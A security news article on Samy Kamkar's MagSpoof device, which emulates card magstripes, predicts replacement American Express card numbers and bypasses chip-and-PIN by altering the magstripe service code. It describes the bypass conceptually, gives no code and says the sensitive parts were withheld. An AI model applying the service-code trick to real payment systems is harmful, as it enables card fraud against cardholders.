This gizmo knows your Amex card number before you've received it

American Express appears to have used a weak algorithm to generate new card numbers

A device built by legendary hacker Samy Kamkar calls into question the security of payment cards as the U.S. continues to grapples with card fraud.

Kamkar's device, nicknamed MagSpoof, is about the size of a U.S. quarter, and it's safe to say it would be a fraudster's dream.

MagSpoof can predict what a new American Express card number will be based on a canceled card's number. The new expiration date can also be predicted based on when the replacement card was requested.

It can also trick point-of-sale readers into accepting payment from cards that are supposed to have a microchip with advanced cryptographic capabilities designed to deter fraud, a system known as chip-and-PIN, but do not.

He noticed that the replacement card's number appeared to have a relationship with other Amex cards he'd had in the past. Kamkar worked out a formula for how the number was calculated, which matched up to 40 cards and replacement cards shared with him by his friends for his research.

"One hundred percent of them followed my predictions," Kamkar said in a phone interview Tuesday. The card generation algorithm "is not very random."

To do the calculation, Kamkar said he just needs the old card number and the expiration date. 

The danger, of course, is that cybercriminals with access to the old card's details could figure out the new card number before the victim has even received it. Once the card is active, the fraudster can go shopping.

American Express officials could not be immediately reached for comment on Monday. Kamkar says he notified them in August, but the company told him they didn't think it was a major issue.

Kamkar said American Express clearly has other anti-fraud measures that could potentially stop abuse, but it's not guaranteed those would stop every fraudulent purchase.

The American Express number prediction capability isn't the only interesting feature built into MagSpoof. Kamkar did an intensive study of the magnetic stripe on the back of payment cards.

credit card Samy Kamkar

Iron oxide filings reveal how a credit card's magnetic stripe is encoded: two solid stripes represent a "1," and a stripe followed by a space represents a "0."

He found the stripe contains a service code that is used to transmit information such as whether a card can be used overseas, if it can be used by an ATM or if it's a chip-and-PIN card.

U.S. retailers have been upgrading their systems to accommodate chip-and-PIN as card companies are now holding them more accountable for fraud if systems are not upgraded.

Chip-and-PIN, also known as EMV, has been used in areas such as Europe for more than a decade. The payment cards have security features that make them difficult to clone, and transactions are authorized in part by a cryptographic microchip.

If someone with a chip-enabled card goes to Target these days and swipes their card's magnetic stripe, the point-of-sale system will see the service code and know that it's a chip card and ask for it to be inserted into a reader, Kamkar said.

"But I discovered that if I can modify the service code, or create a new card with a different magstripe with the same data but just flip that bit, I can essentially disable that requirement for the chip," he said.

Kamkar modified the service code and was able to buy something by swiping a card when it should have been a chip-and-PIN transaction. 

"I was flabbergasted," he said.

When asked if it was Target, Kamkar laughed and said it "was a major retailer."

Kamkar has released the schematics and software for MagSpoof. He is not, however, releasing the information that would allow the generation of American Express card numbers. He's also not releasing the code that would allow the disabling of chip-and-PIN.

MagSpoof is an interesting little piece of hardware. It can store many credit card numbers. It emulates the magnetic field that is generated by a card's magnetic stripe and can project a payment card's details from up to two inches away from a magnetic stripe reader.

On his blog, Kamkar wrote that MagSpoof is intended for research purposes and should only be used with payment cards someone is authorized to use.

Join the CSO newsletter!

Error: Please check your email address.

More about American Express

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Jeremy Kirk

Latest Videos

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

  • 150x50

    IDG Live Webinar:The right collaboration strategy will help your business take flight

    Speakers - Mike Harris, Engineering Services Manager, Jetstar - Christopher Johnson, IT Director APAC, 20th Century Fox - Brent Maxwell, Director of Information Systems, THE ICONIC - IDG MC/Moderator Anthony Caruana

    Play Video

More videos

Blog Posts